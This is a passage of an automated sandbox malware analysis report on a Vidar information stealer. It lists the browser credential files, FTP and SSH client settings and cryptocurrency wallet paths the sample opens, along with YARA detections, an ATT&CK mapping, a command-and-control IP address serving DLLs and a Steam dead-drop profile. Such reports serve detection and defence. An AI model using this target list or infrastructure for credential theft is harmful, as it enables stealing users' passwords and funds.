Live\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\wallet\\|.sqlite\|0\|Komodo Wallet (Atomic)\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet (Atomic)\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.*\|0\|
Source: RegAsm.exe, 00000001.00000002.2107817674.0000000001034000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: \??\C:\Users\user\AppData\Roaming\Ledger Live\Local Storage\leveldb\.a

Opens network shares

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: \\config\			Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: \\config\			Jump to behavior

Tries to harvest and steal Bitcoin Wallet information

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Key opened: HKEY_CURRENT_USER\SOFTWARE\monero-project\monero-core

Jump to behavior

Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Key opened: HKEY_CURRENT_USER\Software\Martin Prikryl\WinSCP 2\Configuration

Jump to behavior

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data	Jump to behavior

Tries to harvest and steal ftp login credentials

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

File opened: C:\Users\user\AppData\Roaming\FileZilla\recentservers.xml

Jump to behavior

Tries to steal Crypto Currency Wallets

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\Bitcoin\wallets\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\Electrum\wallets\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\Electrum\wallets\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\backups\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\ElectronCash\wallets\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\MultiDoge\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\Binance\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\Ledger Live\Local Storage\leveldb\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\Ledger Live\Session Storage\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\Ledger Live\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\atomic_qt\config\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\atomic_qt\exports\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\Guarda\Local Storage\leveldb\	Jump to behavior

Source: Yara match	File source: 00000001.00000002.2106036038.000000000055A000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: RegAsm.exe PID: 7440, type: MEMORYSTR

Remote Access Functionality

Yara detected Vidar

Source: Yara match

File source: sslproxydump.pcap, type: PCAP

Yara detected Vidar stealer

Source: Yara match	File source: 0.2.file.exe.a2b000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.file.exe.a2b000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.file.exe.a00000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000001.00000002.2106036038.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1634539577.0000000000A29000.00000004.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.2107817674.0000000000FB5000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: file.exe PID: 7420, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: RegAsm.exe PID: 7440, type: MEMORYSTR

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 1_2_1994D9E0 sqlite3_bind_int64,sqlite3_log,sqlite3_log,sqlite3_log,sqlite3_bind_int64,sqlite3_log,sqlite3_log,sqlite3_log,	1_2_1994D9E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 1_2_198C5910 sqlite3_mprintf,sqlite3_bind_int64,	1_2_198C5910
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 1_2_1989DB10 sqlite3_initialize,sqlite3_bind_int64,sqlite3_step,sqlite3_column_bytes,sqlite3_column_blob,sqlite3_reset,sqlite3_free,sqlite3_free,sqlite3_bind_int64,sqlite3_step,sqlite3_reset,sqlite3_free,	1_2_1989DB10
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 1_2_19835C70 sqlite3_prepare_v3,sqlite3_bind_int64,sqlite3_step,sqlite3_column_value,sqlite3_result_value,sqlite3_reset,	1_2_19835C70
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 1_2_1989DFC0 sqlite3_bind_int64,sqlite3_bind_int64,sqlite3_bind_int64,sqlite3_bind_int64,sqlite3_bind_int64,sqlite3_mprintf,sqlite3_bind_text,sqlite3_step,sqlite3_reset,	1_2_1989DFC0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 1_2_198A1FE0 sqlite3_mprintf,sqlite3_bind_int64,sqlite3_step,sqlite3_reset,	1_2_198A1FE0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 1_2_198C51D0 sqlite3_mprintf,sqlite3_bind_int64,sqlite3_step,sqlite3_reset,	1_2_198C51D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 1_2_198B9090 sqlite3_reset,sqlite3_bind_int64,sqlite3_step,sqlite3_reset,sqlite3_errmsg,sqlite3_mprintf,	1_2_198B9090
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 1_2_198DD3B0 sqlite3_bind_int64,sqlite3_step,sqlite3_reset,	1_2_198DD3B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 1_2_198C55B0 sqlite3_bind_int64,sqlite3_step,sqlite3_reset,	1_2_198C55B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 1_2_199414D0 sqlite3_bind_int64,sqlite3_log,sqlite3_log,sqlite3_log,	1_2_199414D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 1_2_1994D4F0 sqlite3_bind_value,sqlite3_log,sqlite3_log,sqlite3_log,	1_2_1994D4F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 1_2_198FD610 sqlite3_free,sqlite3_bind_int64,sqlite3_step,sqlite3_reset,sqlite3_bind_int64,sqlite3_step,sqlite3_reset,	1_2_198FD610
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 1_2_19834820 sqlite3_bind_int64,sqlite3_step,sqlite3_column_int64,sqlite3_reset,sqlite3_reset,sqlite3_initialize,	1_2_19834820
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 1_2_19904D40 sqlite3_bind_int64,sqlite3_step,sqlite3_column_int64,sqlite3_reset,sqlite3_reset,InitOnceBeginInitialize,sqlite3_bind_int64,sqlite3_step,sqlite3_reset,sqlite3_free,	1_2_19904D40
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 1_2_19850FB0 sqlite3_result_int64,sqlite3_result_double,sqlite3_result_int,sqlite3_prepare_v3,sqlite3_bind_int64,sqlite3_step,sqlite3_column_value,sqlite3_result_value,sqlite3_reset,	1_2_19850FB0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 1_2_19898200 sqlite3_bind_int64,sqlite3_bind_int64,sqlite3_step,sqlite3_column_int64,sqlite3_reset,sqlite3_bind_int64,sqlite3_step,sqlite3_column_int,sqlite3_reset,	1_2_19898200
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 1_2_19878550 sqlite3_bind_int64,sqlite3_step,sqlite3_column_int64,sqlite3_reset,sqlite3_reset,	1_2_19878550
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 1_2_19848680 sqlite3_mprintf,sqlite3_mprintf,sqlite3_initialize,sqlite3_finalize,sqlite3_free,sqlite3_mprintf,sqlite3_bind_value,sqlite3_bind_int64,sqlite3_bind_int64,	1_2_19848680
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 1_2_198706E0 sqlite3_bind_int64,sqlite3_step,sqlite3_column_int64,sqlite3_reset,	1_2_198706E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 1_2_1984B400 sqlite3_mprintf,sqlite3_mprintf,sqlite3_free,sqlite3_bind_value,sqlite3_reset,sqlite3_step,sqlite3_reset,sqlite3_column_int64,	1_2_1984B400
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 1_2_199037E0 sqlite3_bind_int64,sqlite3_bind_int64,sqlite3_step,sqlite3_reset,	1_2_199037E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 1_2_198E3770 sqlite3_bind_int64,sqlite3_bind_int64,sqlite3_step,sqlite3_reset,	1_2_198E3770
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 1_2_1987EF30 sqlite3_bind_int64,sqlite3_step,sqlite3_reset,sqlite3_result_error_code,	1_2_1987EF30
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 1_2_1989E170 sqlite3_bind_int64,sqlite3_step,sqlite3_reset,	1_2_1989E170
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 1_2_1988E090 sqlite3_bind_int64,sqlite3_bind_value,sqlite3_step,sqlite3_reset,	1_2_1988E090
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 1_2_1988E200 sqlite3_initialize,sqlite3_free,sqlite3_bind_int64,sqlite3_bind_blob,sqlite3_step,sqlite3_reset,	1_2_1988E200
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 1_2_198366C0 sqlite3_mprintf,sqlite3_bind_int64,sqlite3_step,sqlite3_reset,sqlite3_bind_int64,sqlite3_bind_null,sqlite3_bind_blob,sqlite3_bind_value,sqlite3_free,sqlite3_bind_value,sqlite3_step,sqlite3_reset,	1_2_198366C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 1_2_1989A6F0 sqlite3_mprintf,sqlite3_mprintf,sqlite3_mprintf,sqlite3_free,sqlite3_bind_value,	1_2_1989A6F0

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	Valid Accounts	1 Windows Management Instrumentation	1 DLL Side-Loading	1 DLL Side-Loading	1 Deobfuscate/Decode Files or Information	2 OS Credential Dumping	2 System Time Discovery	Remote Services	1 Archive Collected Data	2 Ingress Tool Transfer	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	11 Native API	Boot or Logon Initialization Scripts	411 Process Injection	2 Obfuscated Files or Information	1 Credentials in Registry	1 Account Discovery	Remote Desktop Protocol	4 Data from Local System	21 Encrypted Channel	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	Logon Script (Windows)	Logon Script (Windows)	1 Software Packing	Security Account Manager	4 File and Directory Discovery	SMB/Windows Admin Shares	1 Screen Capture	3 Non-Application Layer Protocol	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	Login Hook	1 DLL Side-Loading	NTDS	154 System Information Discovery	Distributed Component Object Model	Input Capture	14 Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	1 Masquerading	LSA Secrets	1 Network Share Discovery	SSH	Keylogging	Fallback Channels	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	1 Virtualization/Sandbox Evasion	Cached Domain Credentials	141 Security Software Discovery	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	411 Process Injection	DCSync	1 Virtualization/Sandbox Evasion	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery
Network Trust Dependencies	Serverless	Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	Scheduled Task/Job	Indicator Removal from Tools	Proc Filesystem	12 Process Discovery	Cloud Services	Credential API Hooking	Application Layer Protocol	Exfiltration Over Alternative Protocol	Defacement
Network Topology	Malvertising	Exploit Public-Facing Application	Command and Scripting Interpreter	At	At	HTML Smuggling	/etc/passwd and /etc/shadow	1 System Owner/User Discovery	Direct Cloud VM Connections	Data Staged	Web Protocols	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Internal Defacement

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source	Detection	Scanner	Label	Link
file.exe	32%	ReversingLabs
file.exe	100%	Joe Sandbox ML

Dropped Files

Source	Detection	Scanner
C:\ProgramData\KFBFCAFCBKFI\freebl3.dll	0%	ReversingLabs
C:\ProgramData\KFBFCAFCBKFI\mozglue.dll	0%	ReversingLabs
C:\ProgramData\KFBFCAFCBKFI\msvcp140.dll	0%	ReversingLabs
C:\ProgramData\KFBFCAFCBKFI\nss3.dll	0%	ReversingLabs
C:\ProgramData\KFBFCAFCBKFI\softokn3.dll	0%	ReversingLabs
C:\ProgramData\KFBFCAFCBKFI\vcruntime140.dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\sqlx[1].dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\freebl3[1].dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\mozglue[1].dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\msvcp140[1].dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\nss3[1].dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\softokn3[1].dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\vcruntime140[1].dll	0%	ReversingLabs

Unpacked PE Files

⊘No Antivirus matches

Domains

⊘No Antivirus matches

URLs

Source	Detection	Scanner	Label
https://mozilla.org0/	0%	URL Reputation	safe
https://95.217.242.142/msvcp140.dll	0%	Avira URL Cloud	safe
https://95.217.242.142	0%	Avira URL Cloud	safe
https://95.217.242.142/mozglue.dll	0%	Avira URL Cloud	safe
https://95.217.242.142HJE	0%	Avira URL Cloud	safe
https://95.217.242.142/	0%	Avira URL Cloud	safe
https://95.217.242.142/msvcp140.dll/	0%	Avira URL Cloud	safe
https://support.mic.BF	0%	Avira URL Cloud	safe
https://95.217.242.142/vcruntime140.dll	0%	Avira URL Cloud	safe
https://95.217.242.14217d99a9f0nt-Disposition:	0%	Avira URL Cloud	safe
https://95.217.242.142/mozglue.dll;	0%	Avira URL Cloud	safe
https://95.217.242.142/sqlx.dll	0%	Avira URL Cloud	safe
https://95.217.242.142/freebl3.dll7	0%	Avira URL Cloud	safe
https://95.217.242.142/msvcp140.dlly	0%	Avira URL Cloud	safe
https://95.217.242.142/vcruntime140.dllp	0%	Avira URL Cloud	safe
https://95.217.242.142/freebl3.dll	0%	Avira URL Cloud	safe
https://support.office.c	0%	Avira URL Cloud	safe
https://95.217.242.142/nss3.dll	0%	Avira URL Cloud	safe
https://95.217.242.142/softokn3.dlli	0%	Avira URL Cloud	safe
https://95.217.242.142/softokn3.dll	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
steamcommunity.com	23.210.138.105	true	false		high
www.google.com	142.250.191.164	true	false		high

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
https://95.217.242.142/msvcp140.dll	false	Avira URL Cloud: safe	unknown
https://95.217.242.142/vcruntime140.dll	false	Avira URL Cloud: safe	unknown
https://95.217.242.142/mozglue.dll	false	Avira URL Cloud: safe	unknown
https://steamcommunity.com/profiles/76561199680449169	false		high
https://95.217.242.142/	false	Avira URL Cloud: safe	unknown
https://www.google.com/sorry/index?continue=https://www.google.com/async/newtab_ogb%3Fhl%3Den-US%26async%3Dfixed:0&hl=en-US&q=EgRRtT5aGM_-v7EGIjCEhPLSBTrZPAY39cVYHNd6_L3Rxj8WO6tEohgLxJlwyjn4Ct7LVz-jrTx9H46727MyAXJKGVNPUlJZX0FCVVNJVkVfTkVUX01FU1NBR0VaAUM	false		high
https://www.google.com/async/newtab_ogb?hl=en-US&async=fixed:0	false		high
https://95.217.242.142/sqlx.dll	false	Avira URL Cloud: safe	unknown
https://95.217.242.142/freebl3.dll	false	Avira URL Cloud: safe	unknown
https://95.217.242.142/softokn3.dll	false	Avira URL Cloud: safe	unknown
https://www.google.com/async/newtab_promos	false		high
https://www.google.com/sorry/index?continue=https://www.google.com/async/newtab_promos&q=EgRRtT5aGM_-v7EGIjC59ZRJ1dYmOVgs9zYixs7a6VS3cYG9RFenPtHDW-sQCDxbcp_6fD5d67UVJ_1caB4yAXJKGVNPUlJZX0FCVVNJVkVfTkVUX01FU1NBR0VaAUM	false		high
https://95.217.242.142/nss3.dll	false	Avira URL Cloud: safe	unknown
https://www.google.com/async/ddljson?async=ntp:2	false		high
https://www.google.com/complete/search?client=chrome-omni&gs_ri=chrome-ext-ansg&xssi=t&q=&oit=0&oft=1&pgcl=20&gs_rn=42&sugkey=AIzaSyBOti4mM-6x9WDnZIjIeyEU21OpBXqWBgw	false		high

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
https://duckduckgo.com/chrome_newtab	BGCBGCAF.1.dr	false		high
https://duckduckgo.com/ac/?q=	BGCBGCAF.1.dr	false		high
https://steamcommunity.com/?subsection=broadcasts	RegAsm.exe, 00000001.00000002.2106036038.0000000000435000.00000040.00000400.00020000.00000000.sdmp, 76561199680449169[1].htm.1.dr	false		high
https://community.akamai.steamstatic.com/public/css/applications/community/main.css?v=EyWBqDQS-6jg&a	RegAsm.exe, 00000001.00000002.2106036038.0000000000435000.00000040.00000400.00020000.00000000.sdmp, 76561199680449169[1].htm.1.dr	false		high
https://store.steampowered.com/subscriber_agreement/	RegAsm.exe, 00000001.00000002.2107817674.0000000000FB5000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000001.00000002.2106036038.0000000000435000.00000040.00000400.00020000.00000000.sdmp, 76561199680449169[1].htm.1.dr	false		high
https://community.akamai.steamstatic.com/public/javascript/applications/community/libraries~b28b7af6	RegAsm.exe, 00000001.00000002.2107817674.0000000000FB5000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000001.00000002.2106036038.0000000000435000.00000040.00000400.00020000.00000000.sdmp, 76561199680449169[1].htm.1.dr	false		high
https://community.akamai.steamstatic.com/public/javascript/modalContent.js?v=L35TrLJDfqtD&l=engl	RegAsm.exe, 00000001.00000002.2107817674.0000000000FB5000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000001.00000002.2106036038.0000000000435000.00000040.00000400.00020000.00000000.sdmp, 76561199680449169[1].htm.1.dr	false		high
http://www.valvesoftware.com/legal.htm	RegAsm.exe, 00000001.00000002.2107817674.0000000000FB5000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000001.00000002.2106036038.0000000000435000.00000040.00000400.00020000.00000000.sdmp, 76561199680449169[1].htm.1.dr	false		high
https://community.akamai.steamstatic.com/public/css/promo/summer2017/stickers.css?v=HA2Yr5oy3FFG&amp	RegAsm.exe, 00000001.00000002.2107817674.0000000000FB5000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000001.00000002.2106036038.0000000000435000.00000040.00000400.00020000.00000000.sdmp, 76561199680449169[1].htm.1.dr	false		high
https://community.akamai.steamstatic.com/public/shared/images/responsive/logo_valve_footer.png	RegAsm.exe, 00000001.00000002.2107817674.0000000000FB5000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000001.00000002.2106036038.0000000000435000.00000040.00000400.00020000.00000000.sdmp, 76561199680449169[1].htm.1.dr	false		high
https://community.akamai.steamstatic.com/public/shared/images/responsive/header_menu_hamburger.png	RegAsm.exe, 00000001.00000002.2107817674.0000000000FB5000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000001.00000002.2106036038.0000000000435000.00000040.00000400.00020000.00000000.sdmp, 76561199680449169[1].htm.1.dr	false		high
https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17rer.exe	RegAsm.exe, 00000001.00000002.2106036038.000000000051C000.00000040.00000400.00020000.00000000.sdmp	false		high
https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17e	RegAsm.exe, 00000001.00000002.2106036038.000000000051C000.00000040.00000400.00020000.00000000.sdmp	false		high
https://community.akamai.steamstatic.com/public/javascript/global.js?v=B7Vsdo1okyaC&l=english	RegAsm.exe, 00000001.00000002.2107817674.0000000000FB5000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000001.00000002.2106036038.0000000000435000.00000040.00000400.00020000.00000000.sdmp, 76561199680449169[1].htm.1.dr	false		high
https://community.akamai.steamstatic.com/public/shared/css/shared_responsive.css?v=sHIIcMzCffX6&	RegAsm.exe, 00000001.00000002.2107817674.0000000000FB5000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000001.00000002.2106036038.0000000000435000.00000040.00000400.00020000.00000000.sdmp, 76561199680449169[1].htm.1.dr	false		high
https://95.217.242.142	76561199680449169[1].htm.1.dr	false	Avira URL Cloud: safe	unknown
https://www.valvesoftware.com/en/contact?contact-person=Translation%20Team%20Feedback	RegAsm.exe, 00000001.00000002.2107817674.0000000000FB5000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000001.00000002.2106036038.0000000000435000.00000040.00000400.00020000.00000000.sdmp, 76561199680449169[1].htm.1.dr	false		high
https://community.akamai.steamstatic.com/public/javascript/profile.js?v=Iy1ies1ROjUT&l=english	RegAsm.exe, 00000001.00000002.2107817674.0000000000FB5000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000001.00000002.2106036038.0000000000435000.00000040.00000400.00020000.00000000.sdmp, 76561199680449169[1].htm.1.dr	false		high
https://95.217.242.142HJE	RegAsm.exe, 00000001.00000002.2106036038.0000000000435000.00000040.00000400.00020000.00000000.sdmp	false	Avira URL Cloud: safe	low
https://community.akamai.steamstatic.com/public/shared/css/shared_global.css?v=SPpMitTYp6ku&l=en	RegAsm.exe, 00000001.00000002.2107817674.0000000000FB5000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000001.00000002.2106036038.0000000000435000.00000040.00000400.00020000.00000000.sdmp, 76561199680449169[1].htm.1.dr	false		high
https://community.akamai.steamstatic.com/public/javascript/scriptaculous/_combined.js?v=OeNIgrpEF8tL	RegAsm.exe, 00000001.00000002.2107817674.0000000000FB5000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000001.00000002.2106036038.0000000000435000.00000040.00000400.00020000.00000000.sdmp, 76561199680449169[1].htm.1.dr	false		high
https://steamcommunity.com/profiles/76561199680449169jQ	RegAsm.exe, 00000001.00000002.2107817674.0000000000F85000.00000004.00000020.00020000.00000000.sdmp	false		high
https://community.akamai.steamstatic.com/public/shared/javascript/shared_global.js?v=1_BxDGVvfXwv&am	RegAsm.exe, 00000001.00000002.2106036038.0000000000435000.00000040.00000400.00020000.00000000.sdmp, 76561199680449169[1].htm.1.dr	false		high
https://95.217.242.142/msvcp140.dll/	RegAsm.exe, 00000001.00000002.2107817674.0000000000FB5000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://community.akamai.steamstatic.com/public/javascript/applications/community/main.js?v=c4UneKQJ	RegAsm.exe, 00000001.00000002.2107817674.0000000000FB5000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000001.00000002.2106036038.0000000000435000.00000040.00000400.00020000.00000000.sdmp, 76561199680449169[1].htm.1.dr	false		high
http://www.mozilla.com/en-US/blocklist/	mozglue.dll.1.dr, mozglue[1].dll.1.dr	false		high
https://community.akamai.steamstatic.com/public/javascript/webui/clientcom.js?v=3gW5J8_jG_Yc&l=e	RegAsm.exe, 00000001.00000002.2107817674.0000000000FB5000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000001.00000002.2106036038.0000000000435000.00000040.00000400.00020000.00000000.sdmp, 76561199680449169[1].htm.1.dr	false		high
